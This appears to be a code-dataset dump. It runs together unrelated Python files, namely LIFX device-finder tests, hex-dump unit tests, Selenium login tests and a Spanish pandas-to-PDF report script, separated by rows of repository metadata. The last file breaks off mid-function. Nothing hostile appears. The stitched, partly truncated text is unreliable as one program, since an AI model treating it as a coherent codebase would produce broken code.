V.devices.store(device).clear()
found = []
reference = DeviceFinder.from_kwargs(label="kitchen")
async for device in reference.serials(V.sender):
found.append(device)
assert [f.serial for f in found] == [V.d3.serial]
assert found[0].info == {
"hue": V.d3.attrs.color.hue,
"label": "kitchen",
"power": "off",
"serial": V.d3.serial,
"kelvin": V.d3.attrs.color.kelvin,
"saturation": V.d3.attrs.color.saturation,
"brightness": V.d3.attrs.color.brightness,
}
for device in V.devices:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(), LightMessages.GetColor()
)
V.devices.store(device).clear()
found = []
reference = DeviceFinder.from_kwargs(label="kitchen")
async for device in reference.info(V.sender):
found.append(device)
assert [f.serial for f in found] == [V.d3.serial]
assert found[0].info == {
"cap": pytest.helpers.has_caps_list("color", "variable_color_temp"),
"firmware_version": "2.80",
"hue": V.d3.attrs.color.hue,
"label": "kitchen",
"power": "off",
"serial": V.d3.serial,
"kelvin": V.d3.attrs.color.kelvin,
"saturation": V.d3.attrs.color.saturation,
"brightness": V.d3.attrs.color.brightness,
"group_id": "aa000000000000000000000000000000",
"product_id": 27,
"group_name": "g1",
"location_id": "bb000000000000000000000000000000",
"location_name": "l1",
}
for device in V.devices:
if device is V.d3:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(),
LightMessages.GetColor(),
DeviceMessages.GetVersion(),
DeviceMessages.GetHostFirmware(),
DeviceMessages.GetGroup(),
DeviceMessages.GetLocation(),
)
else:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(), LightMessages.GetColor()
)
V.devices.store(device).clear()
async it "can reuse a finder", V:
finder = Finder(V.sender)
reference = DeviceFinder.empty(finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == sorted(V.serials)
for device in V.devices:
V.devices.store(device).assertIncoming(DiscoveryMessages.GetService)
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(label="kitchen", finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == []
for device in V.devices:
V.devices.store(device).assertIncoming(LightMessages.GetColor())
V.devices.store(device).clear()
await V.d3.change_one("label", "kitchen", event=None)
reference = DeviceFinder.from_kwargs(label="kitchen", finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
# It can't find it because the finder has the label cached
assert ss == []
for device in V.devices:
V.devices.store(device).assertIncoming()
V.devices.store(device).clear()
await V.d3.change_one("label", "kitchen", event=None)
reference = DeviceFinder.from_kwargs(label="kitchen", refresh_info=True, finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
# But now it can because refresh_info is True
assert ss == [V.d3.serial]
for device in V.devices:
V.devices.store(device).assertIncoming(LightMessages.GetColor())
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(cap="matrix", finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d1.serial]
for device in V.devices:
V.devices.store(device).assertIncoming(DeviceMessages.GetVersion())
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(cap=["matrix", "multizone"], finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d1.serial, V.d2.serial]
for device in V.devices:
V.devices.store(device).assertIncoming()
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(cap=["not_matrix"], label="kitchen", finder=finder)
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d3.serial]
for device in V.devices:
V.devices.store(device).assertIncoming()
V.devices.store(device).clear()
found = []
reference = DeviceFinder.from_kwargs(label="kitchen", finder=finder)
async for device in reference.serials(V.sender):
found.append(device)
assert [f.serial for f in found] == [V.d3.serial]
assert found[0].info == {
"cap": pytest.helpers.has_caps_list("color", "variable_color_temp"),
"hue": V.d3.attrs.color.hue,
"label": "kitchen",
"power": "off",
"serial": V.d3.serial,
"kelvin": V.d3.attrs.color.kelvin,
"saturation": V.d3.attrs.color.saturation,
"brightness": V.d3.attrs.color.brightness,
"product_id": 27,
}
for device in V.devices:
assert V.devices.store(device) == []
found = []
reference = DeviceFinder.from_kwargs(label="kitchen", finder=finder)
async for device in reference.info(V.sender):
found.append(device)
assert [f.serial for f in found] == [V.d3.serial]
assert found[0].info == {
"cap": pytest.helpers.has_caps_list("color", "variable_color_temp"),
"firmware_version": "2.80",
"hue": V.d3.attrs.color.hue,
"label": "kitchen",
"power": "off",
"serial": V.d3.serial,
"kelvin": V.d3.attrs.color.kelvin,
"saturation": V.d3.attrs.color.saturation,
"brightness": V.d3.attrs.color.brightness,
"group_id": "aa000000000000000000000000000000",
"product_id": 27,
"group_name": "g1",
"location_id": "bb000000000000000000000000000000",
"location_name": "l1",
}
for device in V.devices:
if device is V.d3:
V.devices.store(device).assertIncoming(
DeviceMessages.GetHostFirmware(),
DeviceMessages.GetGroup(),
DeviceMessages.GetLocation(),
)
else:
V.devices.store(device).assertIncoming()
V.devices.store(device).clear()
| 39.858182
| 98
| 0.548992
| 2,309
| 21,922
| 5.119965
| 0.092248
| 0.035865
| 0.038488
| 0.056251
| 0.808493
| 0.801979
| 0.789207
| 0.778548
| 0.767214
| 0.740315
| 0
| 0.020508
| 0.339385
| 21,922
| 549
| 99
| 39.930783
| 0.795816
| 0.005155
| 0
| 0.696035
| 0
| 0
| 0.093511
| 0.01064
| 0
| 0
| 0
| 0
| 0.226872
| 0
| null | null | 0.004405
| 0.017621
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a038eae8b85ba698490a532f76443cd32f20a633
| 4,201
|
py
|
Python
|
tests/test_dump_mem.py
|
dhylands/bioloid3
|
e2b8e4f044110b63decafe514b78b6f7f4d7883e
|
[
"MIT"
] | 11
|
2016-09-18T08:00:18.000Z
|
2021-04-09T10:59:00.000Z
|
tests/test_dump_mem.py
|
dhylands/bioloid3
|
e2b8e4f044110b63decafe514b78b6f7f4d7883e
|
[
"MIT"
] | null | null | null |
tests/test_dump_mem.py
|
dhylands/bioloid3
|
e2b8e4f044110b63decafe514b78b6f7f4d7883e
|
[
"MIT"
] | 5
|
2016-12-26T04:19:30.000Z
|
2022-03-02T00:41:47.000Z
|
#!/usr/bin/env python3
# This file tests the packet parser
import unittest
import binascii
from bioloid.dump_mem import dump_mem
PREFIX = ' Prefix'
class TestDumpMem(unittest.TestCase):
def clear_log(self):
self.log_lines = []
def log(self, str):
self.log_lines.append(str)
#print(str)
def test_empty_buffer(self):
self.clear_log()
dump_mem(b'', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix:No data'
])
def test_less_than_one_line(self):
self.clear_log()
dump_mem(b'0123', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 0123'
])
def test_less_than_one_line_no_ascii(self):
self.clear_log()
dump_mem(b'0123', prefix=PREFIX, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33'
])
def test_exactly_one_line(self):
self.clear_log()
dump_mem(b'0123456789ABCDEF', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF'
])
def test_exactly_one_line_no_ascii(self):
self.clear_log()
dump_mem(b'0123456789ABCDEF', prefix=PREFIX, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46'
])
def test_a_bit_more_than_a_line(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', prefix=PREFIX, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
' Prefix: 0010: 47 G'
])
def test_a_bit_more_than_a_line_no_ascii(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', prefix=PREFIX, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46',
' Prefix: 0010: 47'
])
def test_no_prefix(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', log=self.log)
self.assertEqual(self.log_lines, [
'0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
'0010: 47 G'
])
def test_no_prefix_no_addr(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', show_addr=False, log=self.log)
self.assertEqual(self.log_lines, [
'30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
'47 G'
])
def test_no_prefix_no_addr_no_ascii(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', show_addr=False, show_ascii=False, log=self.log)
self.assertEqual(self.log_lines, [
'30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46',
'47'
])
def test_addr(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', addr=0x1234, log=self.log)
self.assertEqual(self.log_lines, [
'1234: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
'1244: 47 G'
])
def test_addr_line_width(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', addr=0x1234, line_width=8, log=self.log)
self.assertEqual(self.log_lines, [
'1234: 30 31 32 33 34 35 36 37 01234567',
'123c: 38 39 41 42 43 44 45 46 89ABCDEF',
'1244: 47 G'
])
def test_non_printable(self):
self.clear_log()
dump_mem(b'012\x00\x01\x1e\x1f456', log=self.log)
self.assertEqual(self.log_lines, [
'0000: 30 31 32 00 01 1e 1f 34 35 36 012....456',
])
def test_neg_line_width(self):
self.clear_log()
dump_mem(b'0123456789ABCDEFG', prefix=PREFIX, line_width=-6, log=self.log)
self.assertEqual(self.log_lines, [
' Prefix: 0000: 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 0123456789ABCDEF',
' Prefix: 0010: 47 G'
])
if __name__ == '__main__':
unittest.main()
| 32.315385
| 91
| 0.612235
| 638
| 4,201
| 3.846395
| 0.15047
| 0.085575
| 0.07824
| 0.09128
| 0.834556
| 0.810106
| 0.797881
| 0.778321
| 0.719234
| 0.710269
| 0
| 0.216413
| 0.280647
| 4,201
| 129
| 92
| 32.565891
| 0.595632
| 0.015473
| 0
| 0.461538
| 0
| 0.028846
| 0.349867
| 0.005323
| 0
| 0
| 0.002903
| 0
| 0.134615
| 1
| 0.153846
| false
| 0
| 0.028846
| 0
| 0.192308
| 0.009615
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a0840103880ed9956378402aaf466bbc48187ab6
| 9,709
|
py
|
Python
|
qa327_test/frontend/test_login.py
|
15vrs/cmpe-327
|
aeb1de94604eb0d151ffdd9431b4149f2ec30f9c
|
[
"MIT"
] | null | null | null |
qa327_test/frontend/test_login.py
|
15vrs/cmpe-327
|
aeb1de94604eb0d151ffdd9431b4149f2ec30f9c
|
[
"MIT"
] | null | null | null |
qa327_test/frontend/test_login.py
|
15vrs/cmpe-327
|
aeb1de94604eb0d151ffdd9431b4149f2ec30f9c
|
[
"MIT"
] | null | null | null |
import pytest
from seleniumbase import BaseCase
from qa327_test.conftest import base_url
from unittest.mock import Mock, patch
from qa327.models import db, User
from werkzeug.security import generate_password_hash, check_password_hash
# Mock a sample user
test_user = User(
email='test_frontend@test.com',
name='test_frontend',
password=generate_password_hash('Password!'),
balance=0
)
class FrontEndLoginTest(BaseCase):
# R1.1 If the user hasn't logged in, show the login page.
# R1.2 The login page has a message that by default says 'please login'.
# R1.4 The login page provides a login form which requests two fields: email and password.
def test_login_page(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# verify all form elements present
self.assert_element_present("h1")
self.assert_text("Log In", "h1")
self.assert_element_present("h4#message")
self.assert_text("Please login", "h4#message")
self.assert_element_present("input#email")
self.assert_element_present("input#password")
self.assert_element_present("input#btn-submit")
# R1.3 If the user has logged in, redirect to the user profile page.
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.login_user', return_value=test_user)
def test_login_redirect(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit correct credentials
self.type("#email", test_user.email)
self.type("#password", test_user.password)
self.click("input#btn-submit")
# navigate to login page again
self.open(base_url + '/login')
# verify redirect occurred
self.assert_element_present("h2#welcome-header")
self.assert_text("Hi", "h2#welcome-header")
# R1.5 The login form can be submitted as a POST request to the current URL.
# R1.7a Valid email can login.
# R1.10 If email/password are correct, redirect to `/`
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.login_user', return_value=test_user)
def test_login_valid_credentials(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit correct credentials
self.type("#email", test_user.email)
self.type("#password", test_user.password)
self.click("input#btn-submit")
# verify `/` page is displayed
self.assert_element_present("h2#welcome-header")
self.assert_text("Hi", "h2#welcome-header")
# R1.6a Empty email and password does not login.
def test_login_empty_inputs(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit empty form
self.click("input#btn-submit")
# verify all form elements present
self.assert_element_present("h1")
self.assert_text("Log In", "h1")
self.assert_element_present("h4#message")
self.assert_text("Please login", "h4#message")
self.assert_element_present("input#email")
self.assert_element_present("input#password")
self.assert_element_present("input#btn-submit")
# R1.6b Empty email does not login.
def test_login_empty_password(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit incomplete form
self.type("#password", test_user.password)
self.click("input#btn-submit")
# verify all form elements present
self.assert_element_present("h1")
self.assert_text("Log In", "h1")
self.assert_element_present("h4#message")
self.assert_text("Please login", "h4#message")
self.assert_element_present("input#email")
self.assert_element_present("input#password")
self.assert_element_present("input#btn-submit")
# R1.6c Empty password does not login.
def test_login_empty_email(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit incomplete form
self.type("#email", test_user.email)
self.click("input#btn-submit")
# verify all form elements present
self.assert_element_present("h1")
self.assert_text("Log In", "h1")
self.assert_element_present("h4#message")
self.assert_text("Please login", "h4#message")
self.assert_element_present("input#email")
self.assert_element_present("input#password")
self.assert_element_present("input#btn-submit")
# R1.7b Invalid email cannot login and error message 'email/password format is incorrect' is displayed.
def test_login_invalid_email_format(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit correct credentials
self.type("#email", "test_frontend")
self.type("#password", test_user.password)
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password format is incorrect", "h4#message")
# R1.8a User with password shorter than 6 characters cannot log in
# and error message 'email/password format is incorrect' is displayed.
def test_login_invalid_password_less_than_6_characters(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit correct credentials
self.type("#email", test_user.email)
self.type("#password", "Pass!")
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password format is incorrect", "h4#message")
# R1.8b User with password with no uppercase characters cannot log in
# and error message 'email/password format is incorrect' is displayed.
def test_login_invalid_password_no_uppercase(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit correct credentials
self.type("#email", test_user.email)
self.type("#password", "password!")
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password format is incorrect", "h4#message")
# R1.8c User with password with no lowercase characters cannot log in
# and error message 'email/password format is incorrect' is displayed.
def test_login_invalid_password_no_lowercase(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit correct credentials
self.type("#email", test_user.email)
self.type("#password", "PASSWORD!")
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password format is incorrect", "h4#message")
# R1.8d User with password with no special characters cannot log in
# and error message 'email/password format is incorrect' is displayed.
def test_login_invalid_password_no_lowercase(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit correct credentials
self.type("#email", test_user.email)
self.type("#password", "Password")
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password format is incorrect", "h4#message")
# R1.11a Invalid email redirects to `/login` with error message.
@patch('qa327.backend.login_user', return_value=None)
def test_login_invalid_email_credential(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit correct credentials
self.type("#email", "testing@test.com")
self.type("#password", test_user.password)
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password combination incorrect", "h4#message")
# R1.11b Invalid password redirects to `/login` with error message.
@patch('qa327.backend.login_user', return_value=None)
def test_login_invalid_password_credential(self, *_):
# invalidate all sessions
self.open(base_url + '/logout')
# navigate to login page
self.open(base_url + '/login')
# submit correct credentials
self.type("#email", test_user.email)
self.type("#password", "WrongPassword!")
self.click("input#btn-submit")
# verify error message
self.assert_element_present("h4#message")
self.assert_text("email/password combination incorrect", "h4#message")
| 42.770925
| 107
| 0.660212
| 1,230
| 9,709
| 5.043902
| 0.120325
| 0.074146
| 0.079465
| 0.112186
| 0.835429
| 0.821889
| 0.817698
| 0.810123
| 0.798195
| 0.798195
| 0
| 0.013098
| 0.229375
| 9,709
| 227
| 108
| 42.770925
| 0.816092
| 0.270883
| 0
| 0.773723
| 1
| 0
| 0.222841
| 0.023126
| 0
| 0
| 0
| 0
| 0.335766
| 1
| 0.094891
| false
| 0.211679
| 0.043796
| 0
| 0.145985
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
a0a0102ca38f5dda97f57ee7b625218b5ad38128
| 12,331
|
py
|
Python
|
scripts/calculadoraAlimentos/pdf.py
|
Salvaaragon/LasGemelas
|
88deac2b6a464f84a7cebc208b5583e1d2eddb19
|
[
"MIT"
] | null | null | null |
scripts/calculadoraAlimentos/pdf.py
|
Salvaaragon/LasGemelas
|
88deac2b6a464f84a7cebc208b5583e1d2eddb19
|
[
"MIT"
] | null | null | null |
scripts/calculadoraAlimentos/pdf.py
|
Salvaaragon/LasGemelas
|
88deac2b6a464f84a7cebc208b5583e1d2eddb19
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import pandas
import os
# Calcular la sumas de las columnas
# https://stackoverflow.com/questions/41286569/get-total-of-pandas-column
from jinja2 import Environment, FileSystemLoader # Templating
#from weasyprint import HTML # Generating PDF
#from headless_pdfkit import generate_pdf
import pdfkit
# Constantes globales
EXCEL_OUTPUT = "output.xlsx"
EXCEL_EVENTO = "evento.xlsx"
EXCEL_MENU = "menu.xlsx"
EXCEL_RECETA = "receta.xlsx"
SHEET_PRINCIPAL = 0
SHEET_PRODUCTOS = 1
SHEET_BEBIDAS = 2
SHEET_MATERIALES = 3
SHEET_TRABAJADORES = 4
# API:
# def printPDF (html_out:str)
# def printListaCompraReceta ()
# def printListaCompraMenu ()
# def printListaCompraEvento ()
# def printBeneficioReceta ()
# def printBeneficioMenu ()
# def printBeneficioEvento ()
def printPDF (html_out: str, file_name: str):
html_out = str(html_out)
file_name = str(file_name)
# Generate PDF (pdfkit)
this_dir, this_filename = os.path.split(__file__)
pdfkit.from_string(html_out, file_name, css=[this_dir+'/templates/typography.css'])
# Generate PDF (headless pdfkit)
# pdf_out = generate_pdf(html_out)
# with open('evento.pdf', 'wb') as w:
# w.write(pdf_out)
# w.close()
# Generate PDF Weasyprint
#HTML(string=html_out).write_pdf("evento.pdf", stylesheets=["typography.css"])
def printListaCompraReceta ():
# Get name of
str_tituloReceta = pd.ExcelFile(EXCEL_RECETA).sheet_names[0]
# Read Excel sheet to DataFrame
df_principal = pandas.read_excel(io=EXCEL_RECETA, sheet_name=SHEET_PRINCIPAL)
df_productos = pandas.read_excel(io=EXCEL_RECETA, sheet_name=SHEET_PRODUCTOS)
# Eliminación de columnas de Productos
del df_productos['PrecioCompra/Unidad']
del df_productos['PrecioVenta/Unidad']
del df_productos['Coste']
del df_productos['BeneficioBruto']
del df_productos['BeneficioNeto']
# Write dataframe to excel file
writer = pd.ExcelWriter('output.xlsx')
df_principal.to_excel (excel_writer=writer, sheet_name=str_tituloReceta)
df_productos.to_excel (excel_writer=writer, sheet_name='Productos')
writer.save()
# Templating
this_dir, this_filename = os.path.split(__file__)
env = Environment(loader=FileSystemLoader(searchpath=this_dir+'/templates/'))
template = env.get_template('template_receta.html')
template_vars = {
"Receta": str_tituloReceta,
"Titulo": "Lista compra de la Receta: " + str_tituloReceta,
"Productos": df_productos.to_html (na_rep="", justify='center')
}
html_out = template.render(template_vars)
# Print PDF
printPDF(html_out, 'receta.pdf')
def printListaCompraMenu ():
# Get name of
str_tituloMenu = pd.ExcelFile(EXCEL_MENU).sheet_names[0]
# Read Excel sheet to DataFrame
df_principal = pandas.read_excel(io=EXCEL_MENU, sheet_name=SHEET_PRINCIPAL)
df_productos = pandas.read_excel(io=EXCEL_MENU, sheet_name=SHEET_PRODUCTOS)
df_bebidas = pandas.read_excel(io=EXCEL_MENU, sheet_name=SHEET_BEBIDAS)
# Eliminación de columnas de Productos
del df_productos['PrecioCompra/Unidad']
del df_productos['PrecioVenta/Unidad']
del df_productos['Coste']
del df_productos['BeneficioBruto']
del df_productos['BeneficioNeto']
# Eliminación de columnas de Bebidas
del df_bebidas['PrecioCompra/Unidad']
del df_bebidas['PrecioVenta/Unidad']
del df_bebidas['Coste']
del df_bebidas['BeneficioBruto']
del df_bebidas['BeneficioNeto']
# Write dataframe to excel file
writer = pd.ExcelWriter('output.xlsx')
df_principal.to_excel (excel_writer=writer, sheet_name=str_tituloMenu)
df_productos.to_excel (excel_writer=writer, sheet_name='Productos')
df_bebidas.to_excel (excel_writer=writer, sheet_name='Bebidas')
writer.save()
# Templating
this_dir, this_filename = os.path.split(__file__)
env = Environment(loader=FileSystemLoader(searchpath=this_dir+'/templates/'))
template = env.get_template('template_menu.html')
template_vars = {
"Menu": str_tituloMenu,
"Titulo": "Lista compra del Menú: " + str_tituloMenu,
"Productos": df_productos.to_html (na_rep="", justify='center'),
"Bebidas": df_bebidas.to_html (na_rep="", justify='center')
}
html_out = template.render(template_vars)
# Print PDF
printPDF(html_out, 'menu.pdf')
def printListaCompraEvento ():
# Get name of
str_tituloEvento = pd.ExcelFile(EXCEL_EVENTO).sheet_names[0]
# Read Excel sheet to DataFrame
df_principal = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_PRINCIPAL)
df_productos = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_PRODUCTOS)
df_bebidas = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_BEBIDAS)
df_materiales = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_MATERIALES)
# Eliminación de columnas de Productos
del df_productos['PrecioCompra/Unidad']
del df_productos['PrecioVenta/Unidad']
del df_productos['Coste']
del df_productos['BeneficioBruto']
del df_productos['BeneficioNeto']
# Eliminación de columnas de Bebidas
del df_bebidas['PrecioCompra/Unidad']
del df_bebidas['PrecioVenta/Unidad']
del df_bebidas['Coste']
del df_bebidas['BeneficioBruto']
del df_bebidas['BeneficioNeto']
# Eliminación de columnas de Materiales
del df_materiales['PrecioCompra/Unidad']
del df_materiales['PrecioVenta/Unidad']
del df_materiales['Coste']
del df_materiales['BeneficioBruto']
del df_materiales['BeneficioNeto']
# Write dataframe to excel file
writer = pd.ExcelWriter('output.xlsx')
df_principal.to_excel (excel_writer=writer, sheet_name=str_tituloEvento)
df_productos.to_excel (excel_writer=writer, sheet_name='Productos')
df_bebidas.to_excel (excel_writer=writer, sheet_name='Bebidas')
df_materiales.to_excel (excel_writer=writer, sheet_name='Materiales')
writer.save()
# Templating
this_dir, this_filename = os.path.split(__file__)
env = Environment(loader=FileSystemLoader(searchpath=this_dir+'/templates/'))
template = env.get_template('template_evento.html')
template_vars = {
"Evento": str_tituloEvento,
"Titulo": "Lista compra del Evento: " + str_tituloEvento,
"Productos": df_productos.to_html (na_rep="", justify='center'),
"Bebidas": df_bebidas.to_html (na_rep="", justify='center'),
"Materiales": df_materiales.to_html (na_rep="", justify='center')
}
html_out = template.render(template_vars)
# Print PDF
printPDF(html_out, 'evento.pdf')
def printBeneficioReceta ():
# Get name of
str_tituloReceta = pd.ExcelFile(EXCEL_RECETA).sheet_names[0]
# Read Excel sheet to DataFrame
df_principal = pandas.read_excel(io=EXCEL_RECETA, sheet_name=SHEET_PRINCIPAL)
df_productos = pandas.read_excel(io=EXCEL_RECETA, sheet_name=SHEET_PRODUCTOS)
# Calculo de totales de Productos
df_productos.at['Total Coste', 'Coste'] = str(df_productos['Coste'].sum())
df_productos.at['Total Beneficio Bruto', 'BeneficioBruto'] = str(df_productos['BeneficioBruto'].sum())
df_productos.at['Total Beneficio Neto', 'BeneficioNeto'] = str(df_productos['BeneficioNeto'].sum())
# Write dataframe to excel file
writer = pd.ExcelWriter('output.xlsx')
df_principal.to_excel (excel_writer=writer, sheet_name=str_tituloReceta)
df_productos.to_excel (excel_writer=writer, sheet_name='Productos')
writer.save()
# Templating
this_dir, this_filename = os.path.split(__file__)
env = Environment(loader=FileSystemLoader(searchpath=this_dir+'/templates/'))
template = env.get_template('template_receta.html')
template_vars = {
"Receta": str_tituloReceta,
"Titulo": "Beneficio de la Reeta: " + str_tituloReceta,
"Productos": df_productos.to_html(na_rep="", justify='center'),
}
html_out = template.render(template_vars)
# Print PDF
printPDF(html_out, 'receta.pdf')
def printBeneficioMenu ():
# Get name of
str_tituloMenu = pd.ExcelFile(EXCEL_MENU).sheet_names[0]
# Read Excel sheet to DataFrame
df_principal = pandas.read_excel(io=EXCEL_MENU, sheet_name=SHEET_PRINCIPAL)
df_productos = pandas.read_excel(io=EXCEL_MENU, sheet_name=SHEET_PRODUCTOS)
df_bebidas = pandas.read_excel(io=EXCEL_MENU, sheet_name=SHEET_BEBIDAS)
# Calculo de totales de Productos
df_productos.at['Total Coste', 'Coste'] = str(df_productos['Coste'].sum())
df_productos.at['Total Beneficio Bruto', 'BeneficioBruto'] = str(df_productos['BeneficioBruto'].sum())
df_productos.at['Total Beneficio Neto', 'BeneficioNeto'] = str(df_productos['BeneficioNeto'].sum())
# Calculo de totales de Bebidas
df_bebidas.at['Total Coste', 'Coste'] = str(df_bebidas['Coste'].sum())
df_bebidas.at['Total Beneficio Bruto', 'BeneficioBruto'] = str(df_bebidas['BeneficioBruto'].sum())
df_bebidas.at['Total Beneficio Neto', 'BeneficioNeto'] = str(df_bebidas['BeneficioNeto'].sum())
# Write dataframe to excel file
writer = pd.ExcelWriter('output.xlsx')
df_principal.to_excel (excel_writer=writer, sheet_name=str_tituloMenu)
df_productos.to_excel (excel_writer=writer, sheet_name='Productos')
df_bebidas.to_excel (excel_writer=writer, sheet_name='Bebidas')
writer.save()
# Templating
this_dir, this_filename = os.path.split(__file__)
env = Environment(loader=FileSystemLoader(searchpath=this_dir+'/templates/'))
template = env.get_template('template_menu.html')
template_vars = {
"Menu": str_tituloMenu,
"Titulo": "Beneficio del Menú: " + str_tituloMenu,
"Productos": df_productos.to_html(na_rep="", justify='center'),
"Bebidas": df_bebidas.to_html (na_rep="", justify='center'),
}
html_out = template.render(template_vars)
# Print PDF
printPDF(html_out, 'menu.pdf')
def printBeneficioEvento ():
# Get name of
str_tituloEvento = pd.ExcelFile(EXCEL_EVENTO).sheet_names[0]
# Read Excel sheet to DataFrame
df_principal = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_PRINCIPAL)
df_productos = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_PRODUCTOS)
df_bebidas = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_BEBIDAS)
df_materiales = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_MATERIALES)
df_trabajadores = pandas.read_excel(io=EXCEL_EVENTO, sheet_name=SHEET_TRABAJADORES)
# Calculo de totales de Productos
df_productos.at['Total Coste', 'Coste'] = str(df_productos['Coste'].sum())
df_productos.at['Total Beneficio Bruto', 'BeneficioBruto'] = str(df_productos['BeneficioBruto'].sum())
